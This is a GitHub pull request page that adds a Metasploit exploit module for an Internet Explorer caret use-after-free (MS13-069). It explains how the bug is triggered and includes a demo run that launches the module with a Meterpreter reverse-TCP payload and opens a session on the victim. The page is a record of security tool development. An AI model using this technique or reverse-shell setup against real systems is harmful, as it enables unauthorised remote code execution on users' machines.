Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add MS13-069 (CVE-2013-3205) IE ccaret object use-after-free #2401

Merged
merged 1 commit into from Sep 20, 2013
Merged

Add MS13-069 (CVE-2013-3205) IE ccaret object use-after-free #2401

merged 1 commit into from Sep 20, 2013

Conversation

wchen-r7
Copy link
Contributor

This module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first
setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware aware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code
execution under the context of the user.

The vuln works against IE8 on Win 7, but the current version of the custom spray doesn't actually work well against that target. More work is needed before we can add that target for sure. The reason a custom spray is needed is because the document.write() function erases the typical spray routines we use like js_property_spray, or the heaplib + substring one. Tried using an iframe too, but onbeforeeditfocus event doesn't seem to work well in an iframe (does not fire when innerHTML is used.)

Demo of the exploit:

$ msfcli exploits/windows/browser/ms13_069_caret payload=windows/meterpreter/reverse_tcp lhost=10.0.1.76 lport=4444 E
[*] Initializing modules...
payload => windows/meterpreter/reverse_tcp
lhost => 10.0.1.76
lport => 4444
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/awQRdVP83x
[*]  Local IP: http://10.0.1.76:8080/awQRdVP83x
[*] Server started.
msf exploit(ms13_069_caret) > [*] 10.0.1.89        ms13_069_caret - Sending exploit...
[*] Sending stage (770048 bytes) to 10.0.1.89
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.89:3096) at 2013-09-19 21:58:10 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.89:3096) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3140)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1080
[+] Successfully migrated to process 

msf exploit(ms13_069_caret) >

This replaces #2399 because of the filename conflict issue (tape_engine_8A).

@wchen-r7
Add MS13-069 (CVE-2013-3205) IE ccaret object use-after-free
83f54d7 
This module exploits a use-after-free vulnerability found in Internet Explorer,
specifically in how the browser handles the caret (text cursor) object. In IE's
standards mode, the caret handling's vulnerable state can be triggered by first
setting up an editable page with an input field, and then we can force the caret
to update in an onbeforeeditfocus event by setting the body's innerHTML property.
In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write()
function, however, mshtml!CCaret::UpdateScreenCaret remains unaware aware of this
change, and still uses the same reference to the CCaret object. When the function
tries to use this invalid reference to call a virtual function at offset 0x2c, it
finally results a crash. Precise control of the freed object allows arbitrary code
execution under the context of the user.

The vuln works against IE8 on Win 7, but the current version of the custom spray
doesn't actually work well against that target. More work is needed before we can
add that target for sure.  The reason a custom spray is needed is because the
document.write() function erases the typical spray routines we use like
js_property_spray, or the heaplib + substring one.  Tried using an iframe too,
but onbeforeeditfocus event doesn't seem to work well in an iframe (does not
fire when innerHTML is used.)
jvazquez-r7 pushed a commit that referenced this pull request Sep 20, 2013
Land #2401, @wchen-r7's exploit for cve-2013-3205
ec393cf
@jvazquez-r7 jvazquez-r7 merged commit 83f54d7 into rapid7:master Sep 20, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@wchen-r7 @jvazquez-r7